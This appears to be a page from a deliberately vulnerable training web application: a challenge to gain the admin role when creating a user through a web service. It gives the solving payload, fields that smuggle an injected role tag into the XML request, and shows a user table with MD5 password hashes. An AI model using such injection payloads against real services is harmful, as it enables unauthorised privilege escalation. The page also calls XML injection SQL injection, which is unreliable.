SQL Injection with Web Service


The goal of the challenge is to gain admin role when creating a new user.
<role\>admin</role> is a fixed value.

  • username : XXX
  • password : XXX</password><!--
  • email : --><role>admin</role><email>attacker@attacker.com

WSDL File


Existing Users

User ID
Role
User Name
Password
Email
1
admin
admin
21232f297a57a5a743894a0e4a801fc3
admin@site.local
2
user
gordonb
e99a18c428cb38d5f260853678922e03
gordonb@site.local
3
user
1337
8d3533d75ae2c3966d7e0d4fcc69216b
hackme@site.local
4
user
pablo
0d107d09f5bbe40cade3de5c71e9e9b7
pablo@site.local
5
user
smithy
5f4dcc3b5aa765d61d8327deb882cf99
smithy@site.local


Add a new user :

Username
Password
Email